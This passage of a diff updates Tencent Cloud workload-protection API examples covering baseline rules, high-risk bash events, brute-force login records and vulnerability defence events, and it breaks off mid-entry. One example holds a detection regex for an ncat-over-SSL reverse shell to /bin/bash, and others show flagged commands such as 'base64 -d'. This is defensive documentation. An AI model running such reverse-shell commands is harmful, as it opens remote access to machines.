"output": "{\n \"Response\": {\n \"List\": [\n {\n \"AssetType\": \"1\",\n \"HostIds\": [\n \"d99a1b46-cc2d-4633-a11f-4a7663d2523e\"\n ],\n \"RuleName\": \"high level\",\n \"CategoryId\": -1,\n \"RuleDesc\": \"ignore rule\",\n \"Items\": [\n {\n \"ItemId\": 1002,\n \"ItemName\": \"itemname\",\n \"CustomItemValues\": [\n 100\n ],\n \"CategoryId\": 50\n }\n ],\n \"RuleId\": 125,\n \"RuleType\": 1,\n \"HostCount\": 0,\n \"HostIps\": [\n \"127.0.0.1\"\n ]\n }\n ],\n \"RequestId\": \"aaddca9b-8634-47c5-bdf3-add2f36ad7a9\",\n \"Total\": 1\n }\n}",
|
1268
1254
|
"title": "忽略策略列表"
|
1269
1255
|
}
|
1270
1256
|
],
|
1271
1257
|
"DescribeBaselineRuleList": [
|
1272
1258
|
{
|
1273
1259
|
"document": "",
|
1274
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineRuleList\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"Filters\": [\n {\n \"Values\": [\n \"
|
1275
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"RuleName\": \"
|
1260
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineRuleList\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"Filters\": [\n {\n \"Values\": [\n \"auto_****\"\n ],\n \"Name\": \"RuleName\"\n }\n ],\n \"Offset\": \"0\"\n}",
|
1261
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"HostIds\": [\n \"d99a1b46-cc2d-4633-a11f-4a7663d25***\"\n ],\n \"HostIps\": [\n \"176.1.1.**\"\n ],\n \"AssetType\": \"1\",\n \"RuleName\": \"ruleName01\",\n \"CategoryId\": -1,\n \"RuleDesc\": \"rule desc\",\n \"Items\": [\n {\n \"ItemName\": \"name***\",\n \"ItemId\": 1000\n }\n ],\n \"RuleId\": 35184372088862,\n \"RuleType\": 1,\n \"HostCount\": 0\n }\n ],\n \"RequestId\": \"8d445426-dfea-459c-9a13-1c1a3141353d\",\n \"Total\": 1\n }\n}",
|
1276
1262
|
"title": "规则列表"
|
1277
1263
|
}
|
1278
1264
|
],
|
@@ -1296,7 +1282,7 @@
|
|
1296
1282
|
{
|
1297
1283
|
"document": "根据appid查询用户下全部的策略信息",
|
1298
1284
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeBaselineStrategyList\n&Enabled=1\n&Limit=10\n&Offset=0\n&<公共请求参数>",
|
1299
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"f1dd9f5e-4ac0-48a7-9410-c86d24656d9a\",\n \"TotalCount\": 2,\n \"StrategyList\": [\n {\n \"StrategyName\": \"
|
1285
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"f1dd9f5e-4ac0-48a7-9410-c86d24656d9a\",\n \"TotalCount\": 2,\n \"StrategyList\": [\n {\n \"StrategyName\": \"demo-foo\",\n \"StrategyId\": \"10023\",\n \"RuleCount\": 50,\n \"HostCount\": 50,\n \"ScanCycle\": 3,\n \"ScanAt\": \"00:00:00\",\n \"Enabled\": 0,\n \"PassRate\": 70,\n \"CategoryIds\": \"1001,1002,1003\",\n \"IsDefault\": 1\n }\n ]\n }\n}",
|
1300
1286
|
"title": "用户基线策略列表查询"
|
1301
1287
|
}
|
1302
1288
|
],
|
@@ -1336,7 +1322,7 @@
|
|
1336
1322
|
{
|
1337
1323
|
"document": "",
|
1338
1324
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEventsInfoNew\n<公共请求参数>\n\n{\n \"Id\": 12\n}",
|
1339
|
-
"output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 10001,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\",\n \"Platform\": 4,\n \"BashCmd\": \"base64 -d\",\n \"RuleId\": 31390,\n \"RuleName\": \"sh拦截\",\n \"RuleLevel\": 1,\n \"Status\": 5,\n \"CreateTime\": \"2024-10-24 16:20:58\",\n \"Exe\": \"/usr/bin/base64\",\n \"ModifyTime\": \"2024-10-24 16:20:58\",\n \"PsTree\": \"\",\n \"User\": \"0:0\",\n \"Pid\": \"5747\",\n \"RegexBashCmd\": \"base64 -d\",\n \"RuleCategory\": 1,\n \"MachineName\": \"机器名称\",\n \"SuggestScheme\": \"1.检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2.隔离或者删除相关的木马文件;\\n3.对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会执行恶意文件下载、连接矿池、添加公钥、查看敏感文件等操作。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineWanIp\": \"1.1.1.1\",\n \"MachineStatus\": \"ONLINE\",\n \"MachineType\": 2,\n \"DetectBy\": 1\n },\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
1325
|
+
"output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 10001,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\",\n \"Platform\": 4,\n \"BashCmd\": \"base64 -d\",\n \"RuleId\": 31390,\n \"RuleName\": \"sh拦截\",\n \"RuleLevel\": 1,\n \"Status\": 5,\n \"CreateTime\": \"2024-10-24 16:20:58\",\n \"Exe\": \"/usr/bin/base64\",\n \"ModifyTime\": \"2024-10-24 16:20:58\",\n \"PsTree\": \"/bin/sshd\",\n \"User\": \"0:0\",\n \"Pid\": \"5747\",\n \"RegexBashCmd\": \"base64 -d\",\n \"RuleCategory\": 1,\n \"MachineName\": \"机器名称\",\n \"SuggestScheme\": \"1.检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2.隔离或者删除相关的木马文件;\\n3.对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会执行恶意文件下载、连接矿池、添加公钥、查看敏感文件等操作。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineWanIp\": \"1.1.1.1\",\n \"MachineStatus\": \"ONLINE\",\n \"MachineType\": 2,\n \"DetectBy\": 1\n },\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
1340
1326
|
"title": "查询高危命令详情信息"
|
1341
1327
|
}
|
1342
1328
|
],
|
@@ -1344,7 +1330,7 @@
|
|
1344
1330
|
{
|
1345
1331
|
"document": "",
|
1346
1332
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEventsNew\n<公共请求参数>\n\n{\n \"Limit\": \"1\",\n \"Offset\": \"0\"\n}",
|
1347
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Uuid\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"Id\": 3148114,\n \"Quuid\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"HostIp\": \"192.168.111.28\",\n \"User\": \"root\",\n \"Platform\": 4,\n \"BashCmd\": \"./r3hook_tool moc -var www.test123.com\",\n \"RuleId\": 0,\n \"RuleName\": \"sysrule_custom_procmon_1\",\n \"RuleLevel\": 1,\n \"Status\": 0,\n \"CreateTime\": \"2022-09-01 17:28:39\",\n \"MachineName\": \"v_llzlu恶意请求\",\n \"DetectBy\": 0,\n \"Pid\": \"0\",\n \"Exe\": \"\",\n \"ModifyTime\": \"0001-01-01 00:00:00\",\n \"RegexBashCmd\": \"\\\\./r3hook_tool moc -var www\\\\.test123\\\\.com\",\n \"MachineType\": 0,\n \"RuleCategory\": 0\n }\n ],\n \"RequestId\": \"c787b780-0a35-4fa5-aca3-db339b9a20e8\",\n \"TotalCount\": 51315\n }\n}",
|
1333
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Uuid\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"Id\": 3148114,\n \"Quuid\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"HostIp\": \"192.168.111.28\",\n \"User\": \"root\",\n \"Platform\": 4,\n \"BashCmd\": \"./r3hook_tool moc -var www.test123.com\",\n \"RuleId\": 0,\n \"RuleName\": \"sysrule_custom_procmon_1\",\n \"RuleLevel\": 1,\n \"Status\": 0,\n \"CreateTime\": \"2022-09-01 17:28:39\",\n \"MachineName\": \"v_llzlu恶意请求\",\n \"DetectBy\": 0,\n \"Pid\": \"0\",\n \"Exe\": \"/bin/sshd\",\n \"ModifyTime\": \"0001-01-01 00:00:00\",\n \"RegexBashCmd\": \"\\\\./r3hook_tool moc -var www\\\\.test123\\\\.com\",\n \"MachineType\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"146.56.21****\",\n \"PrivateIP\": \"10.206****\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-3gov****\",\n \"InstanceID\": \"ins-bask****\",\n \"HostName\": \"demo_****\"\n },\n \"RuleCategory\": 0\n }\n ],\n \"RequestId\": \"c787b780-0a35-4fa5-aca3-db339b9a20e8\",\n \"TotalCount\": 51315\n }\n}",
|
1348
1334
|
"title": "高危命令事件列表"
|
1349
1335
|
}
|
1350
1336
|
],
|
@@ -1352,7 +1338,7 @@
|
|
1352
1338
|
{
|
1353
1339
|
"document": "",
|
1354
1340
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashPolicies\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"Offset\": \"0\"\n}",
|
1355
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Name\": \"白名单1\",\n \"Enable\": 1,\n \"White\": 0,\n \"BashAction\": 2,\n \"Rule\": \"curl www.qq.com\",\n \"Level\": 2,\n \"Scope\": 2,\n \"Id\": 10004,\n \"Descript\": \"message \\\"白名单1\\\" not found in language \\\"zh-CN\\\"\",\n \"EventId\": 0,\n \"CreateTime\": \"2022-08-19 15:57:45\",\n \"ModifyTime\": \"2022-08-30 23:54:43\",\n \"Uuids\": [],\n \"DealOldEvents\": 0,\n \"Quuids\": [\n \"\"\n ],\n \"Category\": 1,\n \"Rules\": {\n \"Process\": {\n \"Exe\": \"/tmp/test\"\n },\n \"PProcess\": null,\n \"AProcess\": null\n }\n }\n ],\n \"RequestId\": \"f3fe3ac0-099b-4afc-b383-fbf58e8c385a\",\n \"TotalCount\": 1\n }\n}",
|
1341
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Name\": \"白名单1\",\n \"Enable\": 1,\n \"White\": 0,\n \"BashAction\": 2,\n \"Rule\": \"curl www.qq.com\",\n \"Level\": 2,\n \"Scope\": 2,\n \"Id\": 10004,\n \"Descript\": \"message \\\"白名单1\\\" not found in language \\\"zh-CN\\\"\",\n \"EventId\": 0,\n \"CreateTime\": \"2022-08-19 15:57:45\",\n \"ModifyTime\": \"2022-08-30 23:54:43\",\n \"Uuids\": [],\n \"DealOldEvents\": 0,\n \"Quuids\": [\n \"d4cc302e-09e5-436f-b99b-5ab9c9070323\"\n ],\n \"Category\": 1,\n \"Rules\": {\n \"Process\": {\n \"Exe\": \"/tmp/test\",\n \"Cmdline\": \"/tmp/test\"\n },\n \"PProcess\": null,\n \"AProcess\": null\n }\n }\n ],\n \"RequestId\": \"f3fe3ac0-099b-4afc-b383-fbf58e8c385a\",\n \"TotalCount\": 1\n }\n}",
|
1356
1342
|
"title": "策略列表"
|
1357
1343
|
}
|
1358
1344
|
],
|
@@ -1360,7 +1346,7 @@
|
|
1360
1346
|
{
|
1361
1347
|
"document": "获取高危命令规则列表",
|
1362
1348
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashRules\n<公共请求参数>\n\n{\n \"Type\": 1\n}",
|
1363
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 1,\n \"Uuid\": \"
|
1349
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 1,\n \"Uuid\": \"69E78F7F-FFC7-47D1-B406-13C9852******\",\n \"Name\": \"反弹shell\",\n \"Level\": 3,\n \"Rule\": \"ncat\\\\s+--ssl.*?\\\\/bin\\\\/bash\",\n \"Decription\": \"desc\",\n \"Operator\": \"root\",\n \"IsGlobal\": 0,\n \"Status\": 0,\n \"CreateTime\": \"2021-04-10 16:46:55\",\n \"ModifyTime\": \"2021-04-10 16:46:55\",\n \"Hostip\": \"10.0.1****\",\n \"White\": 0,\n \"Uuids\": [\n \"d4cc302e-09e5-436f-b99b-5ab9c9070323\"\n ],\n \"DealOldEvents\": 0,\n \"Description\": \"desc\"\n }\n ],\n \"RequestId\": \"a0e9ed25-686e-452b-8dd1-ef25440c6543\",\n \"TotalCount\": 1\n }\n}",
|
1364
1350
|
"title": "示例"
|
1365
1351
|
}
|
1366
1352
|
],
|
@@ -1368,7 +1354,7 @@
|
|
1368
1354
|
{
|
1369
1355
|
"document": "获取密码破解列表",
|
1370
1356
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBruteAttackList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Offset\": 1\n}",
|
1371
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"BruteAttackList\": [\n {\n \"Id\": 202443000000,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineIp\": \"172.16.0.40\",\n \"MachineName\": \"机器名称\",\n \"UserName\": \"root\",\n \"SrcIp\": \"1.1.1.1\",\n \"Status\": \"SUCCESS\",\n \"EventType\": 300,\n \"Country\": 1,\n \"City\": 343,\n \"Province\": 32,\n \"CreateTime\": \"2024-10-22 19:50:12\",\n \"ModifyTime\": \"2024-10-22 20:06:34\",\n \"BanStatus\": 1,\n \"Count\": 436,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"IsProVersion\": true,\n \"Protocol\": \"ssh\",\n \"Port\": 22,\n \"InstanceId\": \"ins-12332112\",\n \"Location\": \"中国香港::\",\n \"DataStatus\": 0,\n \"RiskLevel\": 2,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"\",\n \"NetworkType\": 0,\n \"NetworkName\": \"
|
1357
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"BruteAttackList\": [\n {\n \"Id\": 202443000000,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineIp\": \"172.16.0.40\",\n \"MachineName\": \"机器名称\",\n \"UserName\": \"root\",\n \"SrcIp\": \"1.1.1.1\",\n \"Status\": \"SUCCESS\",\n \"EventType\": 300,\n \"Country\": 1,\n \"City\": 343,\n \"Province\": 32,\n \"CreateTime\": \"2024-10-22 19:50:12\",\n \"ModifyTime\": \"2024-10-22 20:06:34\",\n \"BanStatus\": 1,\n \"Count\": 436,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"IsProVersion\": true,\n \"Protocol\": \"ssh\",\n \"Port\": 22,\n \"InstanceId\": \"ins-12332112\",\n \"Location\": \"中国香港::\",\n \"DataStatus\": 0,\n \"RiskLevel\": 2,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"10.0.1.92\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-d7f***\",\n \"InstanceID\": \"ins-12332112\",\n \"HostName\": \"hn***\"\n },\n \"DataFrom\": 0,\n \"AttackStatusDesc\": \"破解成功\",\n \"BanExpiredTime\": \"2020-11-21 15:16:00\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
1372
1358
|
"title": "获取密码破解列表"
|
1373
1359
|
}
|
1374
1360
|
],
|
@@ -1383,7 +1369,7 @@
|
|
1383
1369
|
"DescribeCanFixVulMachine": [
|
1384
1370
|
{
|
1385
1371
|
"document": "漏洞修护-查询可修护主机信息",
|
1386
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeCanFixVulMachine\n<公共请求参数>\n\n{\n \"VulIds\": [\n 1\n ],\n \"Quuids\": [\n \"
|
1372
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeCanFixVulMachine\n<公共请求参数>\n\n{\n \"VulIds\": [\n 1\n ],\n \"Quuids\": [\n \"a0770b41-9697-4a1d-8150-b8fa********\"\n ]\n}",
|
1387
1373
|
"output": "{\n \"Response\": {\n \"RequestId\": \"48ca3c70-801e-48b1-80a7-1007afbf5ffb\",\n \"VulInfo\": []\n }\n}",
|
1388
1374
|
"title": "漏洞修护-查询可修护主机信息"
|
1389
1375
|
}
|
@@ -1392,30 +1378,16 @@
|
|
1392
1378
|
{
|
1393
1379
|
"document": "获取木马不可隔离的主机",
|
1394
1380
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeCanNotSeparateMachine\n<公共请求参数>\n\n{\n \"UpdateAll\": true,\n \"Ids\": [\n 1\n ],\n \"ExcludeId\": [\n 1\n ]\n}",
|
1395
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"PrivateIp\": \"
|
1381
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"PrivateIp\": \"1.1.1.1\",\n \"PublicIp\": \"1.1.1.1\",\n \"Alias\": \"dsger***\",\n \"Reason\": 1,\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\"\n }\n ],\n \"RequestId\": \"1ce68339-8828-457f-b358-d5b1b34e4fe9\"\n }\n}",
|
1396
1382
|
"title": "示例"
|
1397
1383
|
}
|
1398
1384
|
],
|
1399
1385
|
"DescribeClientException": [
|
1400
1386
|
{
|
1401
1387
|
"document": "",
|
1402
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeClientException\n<公共请求参数>\n\n{\n \"EndTime\": \"\",\n \"Limit\": \"10\",\n \"ExceptionType\": \"1\",\n \"StartTime\": \"\",\n \"Offset\": \"0\"\n}",
|
1403
|
-
"output": "{\n \"Response\": {\n \"Records\": [\n {\n \"HostIP\": \"172.23.16.2\",\n \"InstanceID\": \"ins-kz85kljw\",\n \"Uuid\": \"2e6353e4-0498-450a-9be5-77e2537247f6\",\n \"OfflineTime\": \"2022-04-24T17:52:37+08:00\",\n \"UninstallTime\": \"
|
1388
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeClientException\n<公共请求参数>\n\n{\n \"EndTime\": \"2020-11-21 15:16:00\",\n \"Limit\": \"10\",\n \"ExceptionType\": \"1\",\n \"StartTime\": \"2020-11-21 15:16:00\",\n \"Offset\": \"0\"\n}",
|
1389
|
+
"output": "{\n \"Response\": {\n \"Records\": [\n {\n \"HostIP\": \"172.23.16.2\",\n \"InstanceID\": \"ins-kz85kljw\",\n \"Uuid\": \"2e6353e4-0498-450a-9be5-77e2537247f6\",\n \"OfflineTime\": \"2022-04-24T17:52:37+08:00\",\n \"UninstallTime\": \"2020-11-21 15:16:00\",\n \"UninstallCmd\": \"sh ******\"\n }\n ],\n \"RequestId\": \"1248a7df-c3fe-4930-b3ff-2af956cf8d66\",\n \"TotalCount\": 944\n }\n}",
|
1404
1390
|
"title": "示例1"
|
1405
|
-
},
|
1406
|
-
{
|
1407
|
-
"document": "",
|
1408
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeClientException\n<公共请求参数>\n\n{\n \"EndTime\": \"\",\n \"Limit\": \"10\",\n \"ExceptionType\": \"1\",\n \"StartTime\": \"\",\n \"Offset\": \"0\"\n}",
|
1409
|
-
"output": "{\n \"Response\": {\n \"Records\": [\n {\n \"HostIP\": \"172.16.48.110\",\n \"InstanceID\": \"ins-7kdvmxgi\",\n \"Uuid\": \"946b0a12-4005-443b-9d0e-a2795d52a8fb\",\n \"OfflineTime\": \"2022-11-15 22:25:05\",\n \"UninstallTime\": \"\",\n \"UninstallCmd\": \"\"\n },\n {\n \"HostIP\": \"10.0.22.33\",\n \"InstanceID\": \"ins-bmavftgm\",\n \"Uuid\": \"e3fddc1e-c2da-431e-9e1b-adfd70cd208c\",\n \"OfflineTime\": \"2022-11-14 17:35:40\",\n \"UninstallTime\": \"\",\n \"UninstallCmd\": \"\"\n },\n {\n \"HostIP\": \"10.0.0.7\",\n \"InstanceID\": \"ins-pgro6nri\",\n \"Uuid\": \"2651386e-e6cf-4e32-ac8e-3bd59e920d27\",\n \"OfflineTime\": \"2022-11-14 17:33:04\",\n \"UninstallTime\": \"\",\n \"UninstallCmd\": \"\"\n },\n {\n \"HostIP\": \"10.0.22.10\",\n \"InstanceID\": \"ins-lukah9oq\",\n \"Uuid\": \"2819e736-eb93-4912-a82a-2eac7c1788b0\",\n \"OfflineTime\": \"2022-11-14 17:31:35\",\n \"UninstallTime\": \"\",\n \"UninstallCmd\": \"\"\n },\n {\n \"HostIP\": \"172.23.0.36\",\n \"InstanceID\": \"ins-g4l64238\",\n \"Uuid\": \"c90117e5-6609-4ad6-b347-7a601dbb81f6\",\n \"OfflineTime\": \"2022-11-14 17:29:58\",\n \"UninstallTime\": \"\",\n \"UninstallCmd\": \"\"\n },\n {\n \"HostIP\": \"172.23.0.36\",\n \"InstanceID\": \"ins-g4l64238\",\n \"Uuid\": \"c90117e5-6609-4ad6-b347-7a601dbb81f6\",\n \"OfflineTime\": \"2022-11-14 14:53:56\",\n \"UninstallTime\": \"\",\n \"UninstallCmd\": \"\"\n },\n {\n \"HostIP\": \"172.16.48.110\",\n \"InstanceID\": \"ins-7kdvmxgi\",\n \"Uuid\": \"946b0a12-4005-443b-9d0e-a2795d52a8fb\",\n \"OfflineTime\": \"2022-11-14 14:26:23\",\n \"UninstallTime\": \"\",\n \"UninstallCmd\": \"\"\n },\n {\n \"HostIP\": \"172.23.0.36\",\n \"InstanceID\": \"ins-g4l64238\",\n \"Uuid\": \"c90117e5-6609-4ad6-b347-7a601dbb81f6\",\n \"OfflineTime\": \"2022-11-14 13:15:22\",\n \"UninstallTime\": \"\",\n \"UninstallCmd\": \"\"\n },\n {\n \"HostIP\": \"172.23.0.36\",\n \"InstanceID\": \"ins-g4l64238\",\n \"Uuid\": \"c90117e5-6609-4ad6-b347-7a601dbb81f6\",\n \"OfflineTime\": \"2022-11-14 13:02:13\",\n \"UninstallTime\": \"\",\n \"UninstallCmd\": \"\"\n },\n {\n \"HostIP\": \"172.23.0.36\",\n \"InstanceID\": \"ins-g4l64238\",\n \"Uuid\": \"c90117e5-6609-4ad6-b347-7a601dbb81f6\",\n \"OfflineTime\": \"2022-11-14 12:48:59\",\n \"UninstallTime\": \"\",\n \"UninstallCmd\": \"\"\n }\n ],\n \"RequestId\": \"74275f9f-9045-472a-8103-99027a2f87ba\",\n \"TotalCount\": 945\n }\n}",
|
1410
|
-
"title": "示例2"
|
1411
|
-
}
|
1412
|
-
],
|
1413
|
-
"DescribeCloudProtectServiceOrderList": [
|
1414
|
-
{
|
1415
|
-
"document": "查询云护航服务订单列表",
|
1416
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeCloudProtectServiceOrderList\n<公共请求参数>\n\n{}",
|
1417
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"67d7cb74-8055-7704-1610-29786d95e2b1\",\n \"Data\": [\n {\n \"ServiceName\": \"巡检服务\",\n \"Type\": \"新购\",\n \"Config\": \"巡检服务: 1次\",\n \"BeginTime\": \"2022-12-31 00:00:00\",\n \"ResourceId\": \"cwpinsp-xxxxxxxx\"\n }\n ]\n }\n}",
|
1418
|
-
"title": "查询云护航服务订单列表"
|
1419
1391
|
}
|
1420
1392
|
],
|
1421
1393
|
"DescribeComponentStatistics": [
|
@@ -1429,16 +1401,16 @@
|
|
1429
1401
|
"DescribeDefenceEventDetail": [
|
1430
1402
|
{
|
1431
1403
|
"document": "",
|
1432
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeDefenceEventDetail\n<公共请求参数>\n\n{\n \"Id\":
|
1433
|
-
"output": "{\n \"Response\": {\n \"Data\": {\n \"Id\":
|
1404
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeDefenceEventDetail\n<公共请求参数>\n\n{\n \"Id\": 13844\n}",
|
1405
|
+
"output": "{\n \"Response\": {\n \"Data\": {\n \"Id\": 13844,\n \"Status\": 1,\n \"Quuid\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"Alias\": \"machinename\",\n \"MachineStatus\": \"ONLINE\",\n \"PrivateIp\": \"10.0.1.233\",\n \"PublicIp\": \"43.138.142.208\",\n \"CreateTime\": \"2024-11-03 00:40:12\",\n \"MergeTime\": \"2024-11-03 16:25:04\",\n \"VulName\": \"ISC BIND 资源管理错误漏洞(CVE-2014-8500)\",\n \"EventType\": 2,\n \"Count\": 76,\n \"CveId\": \"CVE-2014-8500\",\n \"SourceIp\": \"na\",\n \"City\": \"gz\",\n \"SourcePort\": [\n 80\n ],\n \"Description\": \"ISCBIND是美国InternetSystemsConsortium(ISC)公司所维护的一套实现了DNS协议的开源软件。ISCBIND中存在安全漏洞,该漏洞源于程序没有限制授权链。远程攻击者可利用该漏洞造成拒绝服务(内存消耗)。以下版本受到影响:ISCBIND9.0.x至9.8.x版本,9.9.0至9.9.6版本,9.10.0至9.10.1版本。\",\n \"Fix\": \"建议您更新当前系统或软件至最新版,完成漏洞的修复。\",\n \"NetworkPayload\": \"bnVsbDogZXhhbXBsZS5jb20vCm51bGxAI0Bob3N0OiBleGFtcGxlLmNvbQp1c2VyLWFnZW50OiBHby1odHRwLWNsaWVudC8xLjEKYWNjZXB0LWVuY29kaW5nOiBnemlwCmNvbm5lY3Rpb246IGNsb3NlCg==\",\n \"Pid\": 3380048,\n \"MainClass\": \"org.apache.catalina.startup.Bootstrap\",\n \"StackTrace\": \"org.apache.catalina.core.ApplicationFilterChain.doFilter\\norg.apache.catalina.core.StandardWrapperValve.invoke\\norg.apache.catalina.core.StandardContextValve.invoke\\norg.apache.catalina.authenticator.AuthenticatorBase.invoke\\norg.apache.catalina.core.StandardHostValve.invoke\\norg.apache.catalina.valves.ErrorReportValve.invoke\\norg.apache.catalina.valves.AbstractAccessLogValve.invoke\\norg.apache.catalina.core.StandardEngineValve.invoke\\norg.apache.catalina.connector.CoyoteAdapter.service\\norg.apache.coyote.http11.Http11Processor.service\\norg.apache.coyote.AbstractProcessorLight.process\\norg.apache.coyote.AbstractProtocol$ConnectionHandler.process\\norg.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun\\norg.apache.tomcat.util.net.SocketProcessorBase.run\\norg.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker\\norg.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run\\norg.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run\\njava.lang.Thread.run\\n\",\n \"EventDetail\": \"[{\\\"name\\\":\\\"hitSignatureID\\\",\\\"value\\\":\\\"14004\\\"},{\\\"name\\\":\\\"matches\\\",\\\"value\\\":\\\"example.com\\\"}]\",\n \"ExceptionPstree\": \"/bin/bash\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"43.138.142.208\",\n \"PrivateIP\": \"10.0.1.233\",\n \"NetworkType\": 1,\n \"NetworkName\": \"vpc-mbgoxtov\",\n \"InstanceID\": \"ins-j7vumfb6\",\n \"HostName\": \"machinename\"\n }\n },\n \"RequestId\": \"6e91fa6a-9b0b-49d7-9ecd-679e5569b90e\"\n }\n}",
|
1434
1406
|
"title": "获取漏洞防御事件详情"
|
1435
1407
|
}
|
1436
1408
|
],
|
1437
1409
|
"DescribeDirectConnectInstallCommand": [
|
1438
1410
|
{
|
1439
1411
|
"document": "",
|
1440
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeDirectConnectInstallCommand\n<公共请求参数>\n\n{\n \"RegionCode\": \"sz\",\n \"VpcId\": \"vpc-
|
1441
|
-
"output": "{\n \"Response\": {\n \"Ip\": \"10.0.0.11\",\n \"Token\": \"
|
1412
|
+
